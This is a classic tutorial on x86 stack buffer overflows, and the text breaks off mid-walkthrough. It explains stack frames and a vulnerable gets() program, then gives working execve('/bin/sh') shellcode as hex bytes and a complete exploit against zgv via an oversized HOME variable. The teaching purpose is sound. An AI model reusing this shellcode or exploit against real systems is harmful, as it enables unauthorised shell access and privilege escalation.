Buffer Overflow Attacks: A Beginner's Handbook

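Buffer overflows in buffers that depend on user input have become one of the biggest security hazards in modern computing and networking.

The reason is that this kind of error is easy to make at the programming level. It is invisible to a user who does not understand the source code or cannot obtain it, yet many of these errors are easy to exploit.

This paper tries to teach the novice, in particular the average C programmer, how an overflow condition can be shown to be exploitable.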

- Mixter

1 Memory

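Note: process memory is organized the way I describe here on most computers, but the details depend on the processor architecture. This example is for x86 and also roughly applies to SPARC.

The principle of exploiting a buffer overflow is to overwrite parts of memory that are not supposed to be overwritten by arbitrary input, and to make the process execute that input as code. To see how and where an overflow takes place, let's look at how memory is organized.

A page is a part of memory that uses its own relative addressing. The kernel allocates the initial memory for the process, and the process can then access it without having to know where the memory is physically located in RAM.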

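Process memory consists of three sections:

The code segment. The data in this segment are the assembler instructions that the processor executes. Code execution is non-linear: it can skip code, jump, and call functions under certain conditions. For this there is a pointer called EIP, the instruction pointer. The address EIP points to always contains the code that will be executed next.

The data segment, which holds variables and dynamic buffers.

The stack segment, which is used to pass data (arguments) to functions and as space for the functions' own variables. The bottom (start) of the stack usually sits at the very end of the page's virtual memory, and the stack grows downward. The assembler instruction PUSHL adds an item to the top of the stack, and POPL removes one item from the top of the stack and puts it in a register. To access stack memory directly there is the stack pointer ESP, which points to the top (the lowest memory address) of the stack.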
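
The push and pop behaviour described above can be pictured with a toy model. This is only a sketch: struct toy_stack, toy_pushl and toy_popl are made-up names, the "stack" is a small array rather than real process memory, and esp is an array index instead of an address. It shows the top moving toward lower positions on a push and back up on a pop.

```c
#include <assert.h>
#include <stdint.h>

#define STACK_WORDS 16

/* Toy model of a downward-growing stack; not real CPU state. */
struct toy_stack {
    uint32_t mem[STACK_WORDS];
    int esp;                /* index of the current top; STACK_WORDS means empty */
};

void toy_init(struct toy_stack *s) {
    s->esp = STACK_WORDS;
}

/* PUSHL: move the stack pointer down, then store the value there. */
void toy_pushl(struct toy_stack *s, uint32_t value) {
    assert(s->esp > 0);             /* no room left */
    s->esp -= 1;
    s->mem[s->esp] = value;
}

/* POPL: read the value at the top, then move the stack pointer back up. */
uint32_t toy_popl(struct toy_stack *s) {
    assert(s->esp < STACK_WORDS);   /* nothing to pop */
    return s->mem[s->esp++];
}
```

Pushing two values and popping them returns them in reverse order, and esp ends where it started.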

2 Functions

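A function is a piece of code in the code segment that is called, performs a task, and then returns to the previous thread of execution. Optionally, arguments can be passed to a function. In assembler it usually looks like this (a very simple example, just to get the idea):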

memory address  code
0x8054321       pushl $0x0
0x8054322       call $0x80543a0
0x8054327       ret
0x8054328       leave
...
0x80543a0       popl %eax
0x80543a1       addl $0x1337,%eax
0x80543a4       ret

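What happens here? The main function calls function(0). The variable is 0; main pushes it onto the stack and calls the function. The function uses popl to fetch the variable from the stack. When it is finished, it returns to 0x8054327.

Normally the main function would also push the EBP register onto the stack, which the function saves and then restores when it finishes. This is the frame pointer concept, which lets the function use its own offsets for addressing. It is mostly uninteresting when dealing with exploits, because the function will not return to the original execution thread anyway.

We only need to know what the stack looks like. At the top we have the function's internal buffers and variables. After that comes the saved EBP register (32 bits, which is 4 bytes), and then the return address, which is another 4 bytes. Further down are the arguments passed to the function, which are of no interest to us.

In this case our return address is 0x8054327. It is stored on the stack automatically when the function is called. If there is an overflow somewhere in the code, this return address can be overwritten and changed to point to any location in memory.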
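
The layout just described can be written down as a struct to see how far the return address sits from the start of the local buffer. This is a sketch under assumptions: struct frame_model is a hypothetical picture, not something the compiler defines, and the 32-byte size of locals is borrowed from the example in section 3 rather than being fixed by the architecture.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical picture of one 32-bit x86 stack frame, lowest address first. */
struct frame_model {
    uint8_t  locals[32];    /* the function's buffers and variables (size assumed) */
    uint32_t saved_ebp;     /* 4 bytes */
    uint32_t ret_addr;      /* 4 bytes */
    uint32_t first_arg;     /* arguments pushed by the caller */
};

/* Bytes that lie between the start of locals and the return address. */
size_t bytes_before_ret(void) {
    return offsetof(struct frame_model, ret_addr);
}
```

With these sizes, anything written past byte 32 of locals lands in the saved EBP, and anything past byte 36 lands in the return address.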

3 An example of an exploitable program

Let's assume that the function we want to exploit looks like this:

void lame (void) { char small[30]; gets (small); printf("%s\n", small); }

main() { lame (); return 0; }

Compile and disassemble it:

# cc -ggdb blah.c -o blah
/tmp/cca017401.o: In function 'lame':
/root/blah.c: the 'gets' function is dangerous and should not be used.
# gdb blah

/* short explanation: gdb, the GNU debugger is used here to read the
   binary file and disassemble it (translate bytes to assembler code) */

(gdb) disas main
Dump of assembler code for function main:
0x80484c8:  pushl %ebp
0x80484c9:  movl %esp,%ebp
0x80484cb:  call 0x80484a0
0x80484d0:  leave
0x80484d1:  ret

(gdb) disas lame
Dump of assembler code for function lame:
/* saving the frame pointer onto the stack right before the ret address */
0x80484a0:  pushl %ebp
0x80484a1:  movl %esp,%ebp
/* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the
   memory is allocated 4byte-wise (because the processor uses 32bit words)
   this is the equivalent to: char small[30]; */
0x80484a3:  subl $0x20,%esp
/* load a pointer to small[30] (the space on the stack, which is located
   at virtual address 0xffffffe0(%ebp)) on the stack, and call
   the gets function: gets(small); */
0x80484a6:  leal 0xffffffe0(%ebp),%eax
0x80484a9:  pushl %eax
0x80484aa:  call 0x80483ec
0x80484af:  addl $0x4,%esp
/* load the address of small and the address of "%s\n" string on stack
   and call the print function: printf("%s\n", small); */
0x80484b2:  leal 0xffffffe0(%ebp),%eax
0x80484b5:  pushl %eax
0x80484b6:  pushl $0x804852c
0x80484bb:  call 0x80483dc
0x80484c0:  addl $0x8,%esp
/* get the return address, 0x80484d0, from stack and return to that address.
   you don't see that explicitly here because it is done by the CPU as 'ret' */
0x80484c3:  leave
0x80484c4:  ret
End of assembler dump.

3a Overflowing the program

# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Segmentation fault (core dumped)

# gdb blah core
(gdb) info registers
eax:  0x24        36
ecx:  0x804852f   134513967
edx:  0x1         1
ebx:  0x11a3c8    1156040
esp:  0xbffffdb8  -1073742408
ebp:  0x787878    7895160

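EBP is 0x787878, which means we have written more data onto the stack than the input buffer can hold. 0x78 is the hexadecimal value of the character 'x'.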
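
To see why three stray 'x' characters show up as 0x787878, it helps to assemble the register value by hand. The sketch below assumes the saved EBP slot ended up holding three 'x' bytes followed by the terminating zero byte that gets() appends; le32_from_bytes is a hypothetical helper name, and x86 stores 32-bit values with the lowest byte first.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Combine four bytes, lowest address first, into a little-endian 32-bit value. */
uint32_t le32_from_bytes(const unsigned char b[4]) {
    assert(b != NULL);
    return (uint32_t)b[0]
         | ((uint32_t)b[1] << 8)
         | ((uint32_t)b[2] << 16)
         | ((uint32_t)b[3] << 24);
}
```

Feeding it the bytes 'x', 'x', 'x', 0 gives 0x00787878, the value gdb prints for ebp.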

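The process had a buffer of at most 32 bytes. We wrote more data into memory than was reserved for user input and so overwrote the saved EBP with 'x' bytes (a longer input overwrites the return address in the same way). The process then tried to continue using address 0x787878, which caused the segmentation fault.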
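
For contrast, a bounded read does not overflow. The sketch below is an illustration and not part of the original program: read_line_bounded is a hypothetical helper built on the standard fgets(), which never stores more bytes than the size it is given, terminator included.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Read one line into dst without ever writing more than dst_size bytes.
   Returns 0 on success, -1 on end of input or read error. */
int read_line_bounded(FILE *in, char *dst, size_t dst_size) {
    assert(in != NULL && dst != NULL && dst_size > 0);
    if (fgets(dst, (int)dst_size, in) == NULL)
        return -1;
    dst[strcspn(dst, "\n")] = '\0';   /* drop the trailing newline, if any */
    return 0;
}
```

Called as read_line_bounded(stdin, small, sizeof small) in place of gets(small), a 35-character input is cut off after 29 characters and the rest stays in the input stream.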

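3b Changing the return address

Let's try to exploit the program so that it returns into lame() again instead of returning normally. All we have to do is change the return address from 0x80484d0 to 0x80484cb. In memory we have 32 bytes of buffer space, 4 bytes of saved EBP, and 4 bytes of RET.

Here is a simple program that puts the 4-byte return address into a buffer of 1-byte characters: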

main()
{
    int i=0; char buf[44];
    for (i=0;i<=40;i+=4)
        *(long *) &buf[i] = 0x80484cb;
    puts(buf);
}

# ret
ËËËËËËËËËËË,

# (ret;cat)|./blah
test <- user input
ËËËËËËËËËËË,test
test <- user input
test

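Here we are: the program went through the function twice. If an overflow is present, the return address of a function can be changed to alter the program's execution thread.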
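
The odd-looking output of the helper program is just the address 0x80484cb written out byte by byte. The sketch below shows the byte order; store_le32 is a hypothetical helper name, and the remark about the printed character assumes a terminal using ISO 8859-1, where byte 0xcb is displayed as Ë.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store a 32-bit value into four bytes in little-endian (x86) byte order. */
void store_le32(unsigned char out[4], uint32_t value) {
    assert(out != NULL);
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}
```

For 0x80484cb the four bytes are cb 84 04 08. The first one is the visible Ë; the loop in the helper program writes the address 11 times, which matches the 11 Ë characters in the output.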

4 Shellcode

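To keep it simple, shellcode is just assembler instructions that we write onto the stack; we then change the return address so that execution returns onto the stack. With this method we can insert code into a vulnerable process and execute it right there on the stack.

So let's produce insertable assembler code that runs a shell. A common system call is execve(), which loads and runs any binary, terminating execution of the current process. The manual page gives us the usage: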

int execve (const char *filename, char *const argv [], char *const envp[]);

Let's get the details of the system call from glibc2:

# gdb /lib/libc.so.6
(gdb) disas execve
Dump of assembler code for function execve:
0x5da00:  pushl %ebx
/* this is the actual syscall. before a program would call execve, it would
   push the arguments in reverse order on the stack:
   **envp, **argv, *filename */
/* put address of **envp into edx register */
0x5da01:  movl 0x10(%esp,1),%edx
/* put address of **argv into ecx register */
0x5da05:  movl 0xc(%esp,1),%ecx
/* put address of *filename into ebx register */
0x5da09:  movl 0x8(%esp,1),%ebx
/* put 0xb in eax register; 0xb == execve in the internal system call table */
0x5da0d:  movl $0xb,%eax
/* give control to kernel, to execute execve instruction */
0x5da12:  int $0x80
0x5da14:  popl %ebx
0x5da15:  cmpl $0xfffff001,%eax
0x5da1a:  jae 0x5da1d <__syscall_error>
0x5da1c:  ret

End of assembler dump.
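
Seen from C, the three values the disassembly loads into %ebx, %ecx and %edx are the three execve() arguments. The sketch below sets them up for /bin/sh; struct exec_args, shell_args and run are hypothetical names used only for this illustration, and passing a NULL envp is an assumption that matches what the shellcode in section 4b does.

```c
#include <assert.h>
#include <stddef.h>
#include <unistd.h>

/* The three execve() arguments for starting a program with no extra arguments. */
struct exec_args {
    const char *filename;   /* the syscall expects this in %ebx */
    char *argv[2];          /* its address goes in %ecx; NULL-terminated */
    char **envp;            /* goes in %edx; NULL here */
};

struct exec_args shell_args(void) {
    static char path[] = "/bin/sh";
    struct exec_args a = { path, { path, NULL }, NULL };
    return a;
}

/* Issue the call; it only returns (with -1) if execve() fails. */
int run(const struct exec_args *a) {
    assert(a != NULL);
    return execve(a->filename, a->argv, a->envp);
}
```

Note that argv[0] points at the same string as filename and that the array ends with a NULL pointer; the shellcode has to build exactly this small structure in memory by hand.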

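4a Making the code portable

We have to apply a trick so that the shellcode does not need to reference its arguments in memory the conventional way, by giving their exact address on the memory page, which can only be done at compile time.

Once we can estimate the size of the shellcode, we can use the jmp and call instructions to move a specified number of bytes forward or backward in the execution thread.

Why use a call? A CALL automatically stores the return address on the stack, and that return address is the address of the bytes immediately following the CALL instruction. By placing a variable right behind the call, we indirectly push its address onto the stack without having to know it.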

0    jmp           (skip Z bytes forward)
2    popl %esi
... put function(s) here ...
Z    call <-Z+2>   (skip 2 less than Z bytes backward, to POPL)
Z+5  .string       (first variable)

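(Note: if you are going to write code more complex than what is needed to spawn a simple shell, you can put more than one .string behind the code. You know the sizes of those strings, so once you know where the first string is located you can calculate their relative positions.)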

4b Shellcode

.globl code_start               /* we'll need this later, dont mind it */
.globl code_end
        .data
code_start:
        jmp 0x17
        popl %esi
        movl %esi,0x8(%esi)     /* put address of **argv behind shellcode,
                                   0x8 bytes behind it so a /bin/sh has place */
        xorl %eax,%eax          /* put 0 in %eax */
        movb %eax,0x7(%esi)     /* put terminating 0 after /bin/sh string */
        movl %eax,0xc(%esi)     /* another 0 to get the size of a long word */
my_execve:
        movb $0xb,%al           /* execve( */
        movl %esi,%ebx          /* "/bin/sh", */
        leal 0x8(%esi),%ecx     /* & of "/bin/sh", */
        xorl %edx,%edx          /* NULL */
        int $0x80               /* ); */
        call -0x1c
        .string "/bin/shX"      /* X is overwritten by movb %eax,0x7(%esi) */
code_end:

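(The relative offsets 0x17 and -0x1c are obtained by first putting in 0x0, then compiling, disassembling, and looking at the size of the shellcode.)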
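
The two offsets can be checked with simple arithmetic, because a relative jmp or call counts its displacement from the end of the instruction. In the sketch below, branch_target is a hypothetical helper name; the instruction positions and lengths (a 2-byte jmp at offset 0, a 5-byte call at offset 25) are read off the byte string given in section 5a, where the code starts with eb 17 and the call is encoded as e8 e4 ff ff ff.

```c
#include <assert.h>

/* Offset that a relative jmp/call lands on: the displacement is counted
   from the first byte after the instruction. */
long branch_target(long insn_offset, long insn_length, long displacement) {
    assert(insn_length > 0);
    return insn_offset + insn_length + displacement;
}
```

The jmp lands on offset 25, which is the call, and the call lands on offset 2, which is the popl. The address the call pushes is offset 30, the first byte of the "/bin/sh" string.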

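This is already working shellcode, although very minimal. You should at least disassemble the exit() syscall as well and attach it (before the 'call').

The real art of writing shellcode also includes avoiding any binary zeroes in the code (they very often mark the end of input or of a buffer) and modifying it so that, for example, the binary code contains no control or lowercase characters, which some vulnerable programs filter out.

Most of this is done with self-modifying code, like the movb %eax,0x7(%esi) instruction we used. It replaces the X with \0 at run time, without a \0 being present in the shellcode initially.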
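
A quick way to check the "no binary zeroes" rule is to scan the assembled bytes. The sketch below uses a hypothetical helper, first_zero_byte, and compares two encodings of "put 0xb into the accumulator": the 32-bit form movl $0xb,%eax assembles to b8 0b 00 00 00, while movb $0xb,%al assembles to b0 0b, which is why the code above uses the byte-sized form.

```c
#include <assert.h>
#include <stddef.h>

/* Return the index of the first zero byte in code[0..len), or -1 if none. */
long first_zero_byte(const unsigned char *code, size_t len) {
    assert(code != NULL);
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00)
            return (long)i;
    }
    return -1;
}
```

A string-based copy such as strcpy() or gets() would stop at the byte this function reports, cutting off everything after it.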

Let's test this code. Save the code above as code.S and the following file as code.c:

extern void code_start();
extern void code_end();
#include <stdio.h>
main() { ((void (*)(void)) code_start)(); }

# cc -o code code.S code.c
# ./code
bash#

You can now convert the shellcode into a hex char buffer. The best way to do this is to print it out:

#include <stdio.h>
extern void code_start(); extern void code_end();
main() { fprintf(stderr,"%s",code_start); }

Then parse the output with aconv -h or bin2c.pl.

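5 Writing an exploit

Let's look at how to change the return address so that it points to shellcode placed on the stack, and write a sample exploit. We will use zgv, because it is one of the easiest things to exploit.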

# export HOME=`perl -e 'printf "a" x 2000'`
# zgv
Segmentation fault (core dumped)
# gdb /usr/bin/zgv core
#0  0x61616161 in ?? ()
(gdb) info register esp
esp:  0xbffff574  -1073744524

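So this is the top of the stack at the time of the crash. It is safe to assume that we can use it as the return address to our shellcode.

We will now add some NOP (no operation) instructions in front of our shellcode, so that we do not have to predict the exact start of the shellcode in memory with 100% accuracy. The function will return onto the stack somewhere before our shellcode, work its way through the NOPs to the initial JMP, jump to the CALL, jump back to the popl, and run our code on the stack.

Remember what the stack looks like. At the lowest memory address, the top of the stack where ESP points, the local variables are stored, namely the buffer in which zgv stores the HOME environment variable. After that come the saved EBP (4 bytes) and the return address of the previous function. We must write 8 bytes or more beyond the buffer to overwrite the return address with our new address on the stack.

The buffer in zgv is 1024 bytes long. You can find that out by glancing at the code, or by searching for the initial subl $0x400,%esp (=1024) in the vulnerable function. We will now put all these parts together in the exploit.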

5a Sample zgv exploit

/* zgv v3.0 exploit by Mixter
   buffer overflow tutorial - http://1337.tsx.org
   sample exploit, works for example with precompiled
   redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* This is the minimal shellcode from the tutorial */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP 0x90
#define LEN 1032
#define RET 0xbffff574

int main()
{
    char buffer[LEN];
    long retaddr = RET;
    int i;

    fprintf(stderr,"using address 0x%lx\n",retaddr);

    /* this fills the whole buffer with the return address, see 3b) */
    for (i=0;i<LEN;i+=4)
        *(long *)&buffer[i] = retaddr;

    /* this fills the initial buffer with NOP's, 100 chars less than the
       buffer size, so the shellcode and return address fits in comfortably */
    for (i=0;i<(LEN-strlen(shellcode)-100);i++)
        *(buffer+i) = NOP;

    /* after the end of the NOPs, we copy in the execve() shellcode */
    memcpy(buffer+i,shellcode,strlen(shellcode));

    /* export the variable, run zgv */
    setenv("HOME", buffer, 1);
    execlp("zgv","zgv",NULL);
    return 0;
}

/* EOF */

We now have a string looking like this:

[ ... NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ]

While zgv's stack looks like this:

v-- 0xbffff574 is here
[ S M A L L B U F F E R ] [SAVED EBP] [ORIGINAL RET]

The execution thread of zgv is now as follows:

main ... -> function() -> strcpy(smallbuffer,getenv("HOME"));

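At this point zgv does no bounds checking, so it writes beyond smallbuffer, and the return address to main is overwritten with our return address pointing into the stack.

function() then executes leave/ret, and EIP points onto the stack: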

0xbffff574 nop

0xbffff575 nop

0xbffff576 nop

0xbffff577 jmp $0x24 1

0xbffff579 popl %esi 3 <--\ |

[... shellcode star
